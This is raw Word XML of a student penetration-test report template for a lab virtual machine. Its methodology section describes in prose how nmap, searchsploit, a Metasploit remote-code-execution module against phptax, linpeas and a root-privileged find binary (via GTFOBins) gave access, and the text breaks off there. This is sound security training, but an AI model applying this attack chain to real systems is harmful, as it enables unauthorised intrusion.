              <w:spacing w:after="160" w:line="259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irst version created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570F9CBC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</w:tr>
      <w:tr w:rsidR="006F3573" w14:paraId="34DAB60D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566A2D74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425E9E6C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42F0628F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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B01F32D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</w:tr>
      <w:tr w:rsidR="006F3573" w14:paraId="273658F5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4586ED1C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64432396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7EB91837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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DE2F74F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</w:tr>
      <w:tr w:rsidR="006F3573" w14:paraId="0EB874DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AFF7EE0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66B34957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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07117317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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4378DCB9" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5567D29E" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B07E82B" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573"/>
    <w:p w14:paraId="49627B42" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_lplk7fbrqrrb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F714F" w14:textId="0513E0DB" w:rsidR="006F3573" w:rsidRDefault="00727B2F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc85467566"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="417A9162" w14:textId="162820DD" w:rsidR="0033451A" w:rsidRDefault="00727B2F">
      <w:r>
        <w:t xml:space="preserve">The objective of this activity is to conduct a simulated penetration testing activity against a vulnerable Virtual Machine (VM) </w:t>
      </w:r>
      <w:r w:rsidR="003A0974">
        <w:t xml:space="preserve">provided by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A0974">
        <w:t>WithYouWithMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A0974">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31471B6A" w14:textId="77777777" w:rsidR="00DA5B43" w:rsidRDefault="00DA5B43"/>
    <w:p w14:paraId="35A946C5" w14:textId="5D62B57B" w:rsidR="00727D39" w:rsidRDefault="0033451A">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t xml:space="preserve">Student Objective: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The student </w:t>
      </w:r>
      <w:r w:rsidR="009D37B2">
        <w:t>must take a methodical approach to enumerate and then exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the target machine. It is </w:t>
      </w:r>
      <w:r w:rsidR="00AF6FD6">
        <w:t>required that the report cover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> events </w:t>
      </w:r>
      <w:r w:rsidR="009831CE">
        <w:t xml:space="preserve">starting </w:t>
      </w:r>
      <w:r>
        <w:t>from the point the student identifies the Vulnerable VMs IP address on their network (i.e., the initial NMAP scan)</w:t>
      </w:r>
      <w:r w:rsidR="009831CE">
        <w:t xml:space="preserve"> to when the Penetration Test is finished</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E0CB80" w14:textId="77777777" w:rsidR="009831CE" w:rsidRDefault="009831CE"/>
    <w:p w14:paraId="3A0CD220" w14:textId="2FCFD64C" w:rsidR="00DA5B43" w:rsidRDefault="004B224A" w:rsidP="00DA5B43">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc85467567"/>
      <w:r>
        <w:t xml:space="preserve">Minimum </w:t>
      </w:r>
      <w:r w:rsidR="0033451A">
        <w:t>Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="75663B67" w14:textId="39F0A38D" w:rsidR="00727D39" w:rsidRDefault="004B224A" w:rsidP="00DA5B43">
      <w:r>
        <w:t>You must</w:t>
      </w:r>
      <w:r w:rsidR="0033451A">
        <w:t xml:space="preserve"> complete all sections of this report, with particular </w:t>
      </w:r>
      <w:r w:rsidR="00E9219C">
        <w:t>attention</w:t>
      </w:r>
      <w:r w:rsidR="0033451A">
        <w:t xml:space="preserve"> given to</w:t>
      </w:r>
      <w:r w:rsidR="00E9219C">
        <w:t xml:space="preserve"> the following sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3C78EA" w14:textId="1BB8BE4B" w:rsidR="00E9219C" w:rsidRPr="009A5981" w:rsidRDefault="00E9219C" w:rsidP="00E9219C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Summary </w:t>
      </w:r>
      <w:r w:rsidR="002A4AD0">
        <w:t xml:space="preserve">of findings and </w:t>
      </w:r>
      <w:r w:rsidR="00C12A99">
        <w:t xml:space="preserve">recommendations for vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00250232">
        <w:t>remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27263D08" w14:textId="26E475AF" w:rsidR="009A5981" w:rsidRPr="00C12A99" w:rsidRDefault="00241C26" w:rsidP="00E9219C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The m</w:t>
      </w:r>
      <w:r w:rsidR="00C12A99">
        <w:t>ethodology used, including detailed steps taken</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BCA3F" w14:textId="0D56D3A1" w:rsidR="00C12A99" w:rsidRPr="00C12A99" w:rsidRDefault="00C12A99" w:rsidP="00E9219C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Any issues encountered</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056AB3BE" w14:textId="0E9E5705" w:rsidR="00C12A99" w:rsidRDefault="00C12A99" w:rsidP="00E9219C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Risk to the system while the vulnerability remains present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D1A47" w14:textId="7E51FB3F" w:rsidR="009831CE" w:rsidRDefault="009831CE" w:rsidP="009831CE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1DB5F3" w14:textId="22724157" w:rsidR="009831CE" w:rsidRDefault="009831CE" w:rsidP="009831CE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc85467568"/>
      <w:r>
        <w:t>Tips</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2A2095C0" w14:textId="66C4325C" w:rsidR="009831CE" w:rsidRPr="00FC6049" w:rsidRDefault="004321E3" w:rsidP="009831CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Treat this report as if you are passing it on to a client and their security team. Suppose a security team cannot replicate what you were able to do. In that case, it makes the report less helpful in improving security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="0E101A"/>
        </w:rPr>
        <w:t>Screenshots</w:t>
      </w:r>
      <w:r>
        <w:t> will likely make it easier to describe your process, do not be afraid to include them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F6F31" w14:textId="77777777" w:rsidR="00E9219C" w:rsidRPr="00727D39" w:rsidRDefault="00E9219C" w:rsidP="00DA5B43"/>
    <w:p w14:paraId="2EC34054" w14:textId="77777777" w:rsidR="001E371C" w:rsidRPr="001E371C" w:rsidRDefault="001E371C" w:rsidP="0031141B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1387A664" w14:textId="77777777" w:rsidR="00727D39" w:rsidRDefault="00727D39">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="560715EE" w14:textId="1641CCD1" w:rsidR="006F3573" w:rsidRDefault="00F3284A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc85467569"/>
      <w:r w:rsidRPr="00F3284A">
        <w:lastRenderedPageBreak/>
        <w:t>Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidR="00C12A99">
        <w:t xml:space="preserve"> Assessment Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="68E12FDD" w14:textId="5DB78BBE" w:rsidR="008F5D57" w:rsidRDefault="004321E3" w:rsidP="008F5D57">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc85467570"/>
      <w:r>
        <w:t xml:space="preserve">Executive </w:t>
      </w:r>
      <w:r w:rsidR="008710D8">
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6910BBF4" w14:textId="77777777" w:rsidR="001A2FA7" w:rsidRPr="001A2FA7" w:rsidRDefault="00DF7D1E" w:rsidP="001A2FA7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A2FA7" w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>In this section, provide a summary of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42077368" w14:textId="0DFCE4AC" w:rsidR="001A2FA7" w:rsidRPr="001A2FA7" w:rsidRDefault="001A2FA7" w:rsidP="001A2FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>what you were tasked with</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3289C" w14:textId="15B07847" w:rsidR="001A2FA7" w:rsidRPr="001A2FA7" w:rsidRDefault="001A2FA7" w:rsidP="001A2FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>what you have found</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F99BB9E" w14:textId="75ED1C26" w:rsidR="001A2FA7" w:rsidRPr="001A2FA7" w:rsidRDefault="001A2FA7" w:rsidP="001A2FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>if there is currently a risk to the system</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BF7929" w14:textId="5848F7D2" w:rsidR="001A2FA7" w:rsidRPr="001A2FA7" w:rsidRDefault="001A2FA7" w:rsidP="001A2FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>the level of access you were able to achieve</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6797EEC9" w14:textId="562992DD" w:rsidR="001A2FA7" w:rsidRDefault="001A2FA7" w:rsidP="001A2FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">a high-level overview of your recommendations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6EF4F6" w14:textId="77777777" w:rsidR="00D20690" w:rsidRPr="00D20690" w:rsidRDefault="00D20690" w:rsidP="00D20690">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371659B7" w14:textId="3D7C9C0E" w:rsidR="00D20690" w:rsidRPr="00D20690" w:rsidRDefault="001A2FA7" w:rsidP="001A2FA7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2FA7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>It would be best to make this section understandable by technical and non-technical team members of the client. This section has been started for you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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="76CA5D79" w14:textId="77777777" w:rsidTr="00250232">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10217" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DD209DA" w14:textId="1BE4832C" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
            <w:r w:rsidRPr="002A5519">
              <w:t xml:space="preserve">I have been tasked with conducting a penetration testing assessment on a virtual machine </w:t>
            </w:r>
            <w:r w:rsidR="00C90724">
              <w:t>that</w:t>
            </w:r>
            <w:r w:rsidRPr="002A5519">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C90724">
              <w:t>WithYouWithMe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C90724">
              <w:t xml:space="preserve"> has provided</w:t>
            </w:r>
            <w:r w:rsidRPr="002A5519">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A80066D" w14:textId="4C838419" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519"/>
          <w:p w14:paraId="6C6FA0A0" w14:textId="39AF7E15" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
            <w:r w:rsidRPr="002A5519">
              <w:t>My overall objective is to evaluate the security of the virtual machine and provide recommendations for resolving an</w:t>
            </w:r>
            <w:r w:rsidR="003805B4">
              <w:t>y</w:t>
            </w:r>
            <w:r w:rsidRPr="002A5519">
              <w:t xml:space="preserve"> security issues I discover during my evaluation. I am then to provide a report back to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002A5519">
              <w:t>WithYouWithMe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002A5519">
              <w:t xml:space="preserve"> to support their team in assessing and remediating any issues</w:t>
            </w:r>
            <w:r w:rsidR="00D444EB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D444EB" w:rsidRPr="002A5519">
              <w:t>discovered</w:t>
            </w:r>
            <w:r w:rsidRPr="002A5519">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="035BE0C3" w14:textId="77777777" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="008F5D57"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13616914" w14:textId="77777777" w:rsidR="00F3284A" w:rsidRPr="002A5519" w:rsidRDefault="00F3284A" w:rsidP="008F5D57"/>
    <w:p w14:paraId="04DC5CAB" w14:textId="50DCF771" w:rsidR="00D1430F" w:rsidRPr="002A5519" w:rsidRDefault="008710D8" w:rsidP="00D1430F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc85467571"/>
      <w:r w:rsidRPr="002A5519">
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1AD2654A" w14:textId="14849609" w:rsidR="00D20690" w:rsidRPr="002A5519" w:rsidRDefault="008710D8" w:rsidP="00D1430F">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidR="00D1430F" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D1430F" w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, consider how the </w:t>
      </w:r>
      <w:r w:rsidR="00DF7D1E" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF7D1E" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>of the virtual machine can be improved through changes (short and long</w:t>
      </w:r>
      <w:r w:rsidR="00C83CA1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00DF7D1E" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>term) that you could make. Consider how the software is used, if it is still relevant, or if it is not functioning as intended (i.e., a</w:t>
      </w:r>
      <w:r w:rsidR="00D95189">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration error</w:t>
      </w:r>
      <w:r w:rsidR="00DF7D1E" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="3E57BE78" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F64964B" w14:textId="3EC89CE9" w:rsidR="00D828CA" w:rsidRDefault="00D828CA" w:rsidP="00D1430F">
            <w:r>
              <w:t>Consider if the application still needs to be used, if not, remove and replace with</w:t>
            </w:r>
            <w:r w:rsidR="00263D13">
              <w:t xml:space="preserve"> a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> more secure product. If it does, then implement input validation where possible.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0867292F" w14:textId="77777777" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D1430F"/>
          <w:p w14:paraId="428D35DA" w14:textId="6EFEAEFF" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D1430F"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="699D3CC3" w14:textId="77777777" w:rsidR="00DF7D1E" w:rsidRPr="002A5519" w:rsidRDefault="00DF7D1E" w:rsidP="00D1430F"/>
    <w:p w14:paraId="1AF8EAEB" w14:textId="1F20FDF0" w:rsidR="00727D39" w:rsidRPr="002A5519" w:rsidRDefault="00DF7D1E" w:rsidP="00727D39">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc85467572"/>
      <w:r w:rsidRPr="002A5519">
        <w:t>Methodology Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0A578430" w14:textId="028FF1D0" w:rsidR="00DF7D1E" w:rsidRPr="002A5519" w:rsidRDefault="00DF7D1E" w:rsidP="00DF7D1E">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D65E85" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, provide </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D65E85" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00D95189">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>brief</w:t>
      </w:r>
      <w:r w:rsidR="00D65E85" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> summary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D65E85" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of the major stages of your assessment methodology. For example, conducted an initial scan with a network mapping tool, </w:t>
      </w:r>
      <w:r w:rsidR="002A5519" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reviewed the findings against a particular database, verified the initial vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00D95189">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002A5519" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and then continued enumeration etc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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w:rsidRPr="002A5519" w14:paraId="28DCA8F6" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B324B68" w14:textId="7DEDB8C5" w:rsidR="002A5519" w:rsidRPr="00D828CA" w:rsidRDefault="00D828CA" w:rsidP="008F5D57">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">I ran NMAP to initially discover the target IP, then ran a more thorough scan of that address. The scan indicated open ports on 22 (SSH) and 80 (HTTP – hosting the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>phptax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> application). On further enumeration (using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>searchsploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>) it became clear that a remote code execution vulnerability existed within this application, along with an accompanying exploit module within Metasploit. I was able to run this module to gain an initial foothold within the target system which I then used to run an automated enumeration script (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>linpeas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">). While scanning through the data returned from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>linpeas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, I found an executable binary (find) which was able to be run with root privileges</w:t>
            </w:r>
            <w:r w:rsidR="008301FC">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">. I searched </w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="008301FC" w:rsidRPr="002317E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://gtfobins.github.io/gtfobins/find/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008301FC">
              <w:rPr>
